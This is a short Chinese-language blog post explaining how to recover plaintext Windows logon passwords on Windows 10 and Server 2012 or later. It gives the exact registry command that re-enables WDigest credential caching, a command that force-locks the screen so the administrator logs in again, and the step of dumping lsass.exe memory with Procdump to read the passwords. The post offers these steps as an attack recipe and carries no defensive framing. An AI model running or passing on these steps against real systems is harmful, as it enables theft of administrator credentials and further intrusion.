Win10及2012以后的系统,如何抓取明文?

2024-03-31 18:22:46

当系统为win10或2012以上时,默认在Wdigest内存中禁止保存明文密码(hash可以抓到),可以通过修改注册表的方式进行绕过。

  1. 修改注册表
打开:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
关闭:
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
  1. 开启 Wdigest Auth 后,需要重新登录才能抓到明文,可以使用强制锁屏的方式,让管理员重新登录。
rundll32 user32.dll,LockWorkStation
  1. 登录后,再使用Procdump获取内存lsass.exe中的信息,就可以得到明文了。



上一篇:超值分享:ASN.1格式解析源码(未使用openssl),有助于分析证书、私钥等文件


下一篇:Windows网络通信流量和网速监控设计(一)